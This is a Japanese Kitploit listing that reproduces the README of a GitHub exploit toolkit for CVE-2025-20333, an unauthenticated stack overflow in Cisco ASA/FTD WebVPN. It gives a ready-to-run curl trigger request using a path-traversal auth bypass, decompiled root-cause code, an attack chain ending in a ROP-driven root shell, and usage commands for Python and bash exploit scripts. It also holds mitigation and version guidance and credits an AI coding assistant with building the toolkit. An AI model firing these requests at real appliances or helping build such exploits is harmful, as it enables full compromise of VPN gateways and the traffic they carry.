Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-20333 — CVE-2025-20333(Cisco ASA/FTD WebVPN の重大なスタックバッファオーバーフロー)向けの完全な調査・悪用ツールキット。詳細なバイナリ解析、Python および bash による PoC エクスプロイト、悪用ガイドを含みます。 | Kitploit
ツール/GitHubGitHub/cobbbex/cve-2025-20333
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングバイナリエクスプロイト
GitHubcobbbex/cve-2025-20333

cve-2025-20333

CVE-2025-20333(Cisco ASA/FTD WebVPN の重大なスタックバッファオーバーフロー)向けの完全な調査・悪用ツールキット。詳細なバイナリ解析、Python および bash による PoC エクスプロイト、悪用ガイドを含みます。

リポジトリを見る
1320日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-20333 - 完全な調査・悪用ツールキット

概要

このディレクトリには、Cisco ASA/FTD WebVPN サーバーにおける重大なスタックバッファオーバーフロー脆弱性である CVE-2025-20333 に関する包括的な調査、分析、および概念実証コードが含まれています。

ステータス: ⚠️ 実環境で活発に悪用中(ArcaneDoor キャンペーン)
CVSS スコア: 9.8 Critical
認証: 不要(CVE-2025-20362 により回避)
影響: root としてのリモートコード実行


内容

📚 ドキュメント

CVE-2025-20333-RESEARCH-NOTES.md(20 KB)

完全なリバースエンジニアリング調査

  • 脆弱性の背景とウェブインテリジェンス
  • バイナリ解析(ASA 9.12.4.x lina プロセス)
  • リクエスト取り込み層の監査
  • Lua API バインディングの解析
  • 🎯 オーバーフローの発見(body_lexer.re2c、FUN_0302e690)
  • 攻撃チェーンの内訳
  • コードパターンによる根本原因分析
  • ツール・アドレス参照表
  • 主要な発見:

    root@kitploit:~
    body_lexer.re2c 内の固定 16 バイトバッファ(local_58[16])
    URL デコードループに境界チェックが無い
    iVar11 < 16 を確認せずに local_58[iVar11] へ書き込み
    8 組の 16 進ペア後: オーバーフロー → スタック破壊 → RCE
    

    EXPLOITATION-GUIDE.md(12 KB)

    実践的な悪用マニュアル

    • 脆弱性の仕組みの解説
    • 完全な攻撃チェーン(CVE-2025-20362 バイパス + オーバーフロー)
    • ステップバイステップの悪用手順
    • ペイロード作成テクニック
    • ネットワークベースの検出方法
    • ホストベースの検出とログ分析
    • 緩和策
    • パッチ適用済みバージョンとアップグレードパス
    • 法的・倫理的考慮事項

    🔧 概念実証エクスプロイト

    cve-2025-20333-poc.py(15 KB)

    フル機能の Python エクスプロイト

    機能:

    • 自動ペイロード生成
    • CVE-2025-20362 パストラバーサル統合
    • ROP ガジェットチェーン構築
    • SSL/TLS サポート
    • 設定可能なタイムアウト
    • 詳細な進捗レポート

    使用方法:

    root@kitploit:~
    # 脆弱性の詳細を表示
    python3 cve-2025-20333-poc.py --details
    
    # ターゲットを悪用
    python3 cve-2025-20333-poc.py 192.168.1.100 443
    
    # カスタム設定
    python3 cve-2025-20333-poc.py firewall.example.com 8443 -t 30
    

    cve-2025-20333-poc.sh(8.5 KB)

    軽量な bash エクスプロイト

    機能:

    • Python 依存なし
    • curl または netcat を使用
    • 最小限のリソース消費
    • 教育的なコメント
    • 明確なステータス出力

    使用方法:

    root@kitploit:~
    # 詳細を表示
    ./cve-2025-20333-poc.sh --details
    
    # 悪用
    ./cve-2025-20333-poc.sh 192.168.1.100 443 10
    
    # curl による手動実行
    curl -X POST https://target/+CSCOU+/../+CSCOE+/files/file_list.json \
      -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" --insecure
    

    脆弱性の概要

    クイックファクト

    プロパティ値
    CVE IDCVE-2025-20333
    タイプスタックバッファオーバーフロー(CWE-120)
    コンポーネントbody_lexer.re2c(FUN_0302e690)
    影響を受けるバージョンASA 9.16–9.23、FTD 7.0–7.7
    CVSS v3.19.8(Critical)
    認証不要(CVE-2025-20362 経由)
    ユーザー操作なし
    影響root としての RCE、システム完全侵害
    ステータス活発に悪用中(2025年5月以降)
    責任ある開示Cisco がパッチ適用済み、アドバイザリ公開済み

    根本原因

    root@kitploit:~
    // body_lexer.re2c - URL デコードループ
    byte local_58[16];  // ← 固定 16 バイトバッファ
    
    while (parsing_request_body) {
        byte input = *data++;
        
        if (input == '%') {
            hex_decode_mode = true;
            hex_index = 0;
        }
        
        if (hex_decode_mode) {
            local_58[hex_index] = input;  // ← 境界チェックなし!
            hex_index++;
            
            if (hex_index == 2) {
                byte decoded = hex_pair_to_byte(local_58[0], local_58[1]);
                hex_decode_mode = false;
            }
        }
    }
    

    オーバーフロートリガー: POST ボディ内の 9 個以上の連続する %XX シーケンス

    攻撃チェーン

    root@kitploit:~
    1. 攻撃者(認証不要)
       ↓
    2. /+CSCOU+/../+CSCOE+/files/file_list.json への HTTP POST
       ├─ CVE-2025-20362: パストラバーサルで認証チェックを回避
       └─ files_retr.lua エンドポイントに到達(auth_flag = 0)
       ↓
    3. POST ボディ: name=%2f%2f%2f%2f%2f%2f%2f%2f%2f
       (9 個以上の URL エンコードペア)
       ↓
    4. body_lexer.re2c が POST ボディを処理
       ├─ 16 進ペアを local_58[16] に蓄積
       └─ 8 ペア後: オーバーフロー!
       ↓
    5. スタック破壊
       ├─ local_48、local_40 を上書き
       ├─ 保存された RBP を上書き
       └─ 保存された RIP(リターンアドレス)を上書き
       ↓
    6. 制御フローハイジャック
       ├─ RIP が ROP ガジェットを指す
       ├─ ROP チェーンが execve() をセットアップ
       └─ execve("/bin/sh", NULL, NULL)
       ↓
    7. root としての RCE(lina プロセスは root で実行)
       ├─ VPN サーバー完全侵害
       ├─ すべての VPN トラフィックへのアクセス
       └─ NVRAM 改変による永続化
    

    調査プロセス

    フェーズ 1: バイナリ解析 ✅

    • Ghidra で lina バイナリをオープン
    • WebVPN リクエストアーキテクチャをマッピング(HTTP パーサー、URL ルーター、13 のエンドポイントフック)
    • リクエスト取り込み層を監査(すべて clString/固定サイズ割り当てで安全)
    • Lua API バインディングを調査(すべて安全)

    フェーズ 2: ウェブインテリジェンス ✅

    • CVE-2025-20333 の技術詳細を検索
    • Rapid7、Zscaler、Horizon3、Tenable の分析を発見
    • 攻撃チェーンが /+CSCOU+/../+CSCOE+/files/file_list.json を使用することを確認
    • 根本原因を特定: Lua エンドポイントにおけるヒープベース(ウェブ情報源)/ スタックベース(本バイナリ)のオーバーフロー

    フェーズ 3: ターゲットリバースエンジニアリング ✅

    • body_lexer.re2c(FUN_0302e690)を逆コンパイル
    • 発見: 境界チェックのない固定 16 バイトバッファ local_58[16]
    • オーバーフローパスを確認: URL デコードループ → 境界なし書き込み
    • 到達可能性を検証: files_retr.lua → body_lexer → スタックオーバーフロー

    フェーズ 4: エクスプロイト開発 ✅

    • ROP チェーン対応の Python PoC を作成
    • 最小環境向けの bash PoC を作成
    • ペイロード構造と作成テクニックを文書化
    • 検出・緩和ガイダンスを含める

    使用手順

    許可を得たペネトレーションテスト向け

    1. 許可の確認

      • テストの書面による許可を取得
      • ターゲットシステムの詳細を確認(IP、ポート、バージョン)
      • スコープとタイムラインを文書化
    2. エクスプロイトの実行

      root@kitploit:~
      # クイックチェック: ターゲットはエクスプロイト試行に応答するか?
      python3 cve-2025-20333-poc.py <target_ip>
      
      # または bash 版:
      ./cve-2025-20333-poc.sh <target_ip>
      
    3. 悪用の検証

      • シェルアクセス / リバースシェル接続を確認
      • クラッシュや異常のシステムログを調査
      • 変更されたファイルをスキャン(NVRAM、永続バックドア)
    4. 調査結果の文書化

      • ターゲットのバージョン、パッチレベルを記録
      • 悪用の成功/失敗を文書化
      • 遭遇した防御策を記録
      • 是正推奨事項とともにクライアントに報告

    セキュリティ研究向け

    1. 調査ノートを読む

      • CVE-2025-20333-RESEARCH-NOTES.md を学習
      • バイナリアーキテクチャとオーバーフローメカニズムを理解
    2. PoC を研究

      • ROP ガジェット構築の Python PoC をレビュー
      • 最小エクスプロイトの bash PoC をレビュー
      • ペイロードエンコーディングを理解
    3. 適応と拡張

      • カスタムシェルコードを追加
      • 異なる悪用テクニックを実装
      • パッチ適用済み vs 脆弱なバージョンでテスト

    重要な警告

    ⚠️ 法的通知

    このツールキットは 許可を得たセキュリティテスト専用 に提供されています。

    • 明示的な書面による許可なしにシステムに対して 使用しないでください
    • 悪意のある目的(データ窃取、サービス妨害、ランサムウェア)で 使用しないでください
    • 不正アクセスは コンピュータ詐欺及び不正使用防止法(米国) および世界各国の同様の法律に違反します
    • 罰則には刑事訴追、罰金、禁固刑が含まれます

    ✅ 許可された使用:

    • 書面による承認を得たペネトレーションテスト
    • 脆弱性研究における概念実証
    • 内部セキュリティテスト
    • CTF コンペティション
    • 学術研究

    ❌ 禁止された使用:

    • 許可のないシステムへの攻撃
    • ランサムウェアの展開
    • データ窃取または恐喝
    • サービス妨害
    • 侵害されたネットワーク内での横移動

    ファイル一覧

    root@kitploit:~
    cve-2025-20333/
    ├── README.md                              (本ファイル)
    ├── CVE-2025-20333-RESEARCH-NOTES.md      (20 KB、包括的な調査)
    ├── EXPLOITATION-GUIDE.md                 (12 KB、実践ガイド)
    ├── cve-2025-20333-poc.py                 (15 KB、Python PoC)
    └── cve-2025-20333-poc.sh                 (8.5 KB、bash PoC)
    

    ドキュメント合計: 約 65 KB
    調査深度: 50 以上の Ghidra 関数を監査
    検証済みの発見: body_lexer.re2c のバッファオーバーフローを確認


    クイックリファレンス

    脆弱性クイックテスト

    root@kitploit:~
    # ターゲットが悪用に対して脆弱かテスト
    curl -X POST https://<target>/+CSCOU+/../+CSCOE+/files/file_list.json \
      -d "name=%2f%2f%2f%2f%2f%2f%2f%2f%2f" \
      --insecure \
      -i
    
    # ターゲットが応答した場合(200、500、クラッシュ)、脆弱な可能性あり
    # ターゲットがブロック/リダイレクトした場合、パッチ適用済みの可能性あり
    

    バージョンチェック

    root@kitploit:~
    # 脆弱なバージョン:
    # - Cisco ASA 9.16 から 9.23
    # - Cisco FTD 7.0 から 7.7
    
    # SSH/コンソールで ASA バージョンを確認:
    show version
    
    # パッチ適用済みバージョン:
    # - ASA 9.16.4.51、9.18.4.31、9.20.4.49、9.22.4.9、9.24.1+
    # - FTD 7.0.x、7.1.x、7.2.x(パッチ適用済み)
    

    緩和チェックリスト

    • ASA/FTD バージョンを確認
    • 利用可能なパッチを確認
    • 脆弱な場合はパッチ適用済みバージョンにアップグレード
    • WebVPN アクセスを IP アドレスで制限
    • ロギングとモニタリングを有効化
    • CVE-2025-20362 パストラバーサル試行を監視
    • DoS パターン(lina クラッシュ)を監視
    • WebVPN ポートにファイアウォール保護を有効化

    参考情報

    • Cisco セキュリティアドバイザリ: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-webvpn-z5xP8EUB
    • Rapid7 分析: https://www.rapid7.com/blog/post/etr-cve-2025-20333-cve-2025-20362-cve-2025-20363-multiple-critical-vulnerabilities-affecting-cisco-products/
    • Zscaler ThreatLabz: https://www.zscaler.com/blogs/security-research/cisco-firewall-and-vpn-zero-day-attacks-cve-2025-20333-and-cve-2025-20362
    • Tenable FAQ: https://www.tenable.com/blog/cve-2025-20333-cve-2025-20362-faq-cisco-asa-ftd-zero-days-uat4356

    免責事項

    このツールキットは、教育および許可を得たテスト目的のみで AS-IS で提供されます。

    • 自己責任で使用してください
    • 誤用に対する保証や責任はありません
    • 不正アクセスは違法です
    • 調査結果は Cisco および影響を受ける組織に責任を持って報告してください
    • お住まいの国のサイバーセキュリティ法に従ってください


    謝辞

    このプロジェクトは、Anthropic の AI 搭載コーディングアシスタントである Claude Code の支援を受けて開発されました。


    作成日: 2026-08-23
    調査期間: 2026-08-22 から 2026-08-23
    ステータス: 完了・文書化済み
    分類: 教育用 / 許可を得たテスト専用

    ツールをダウンロード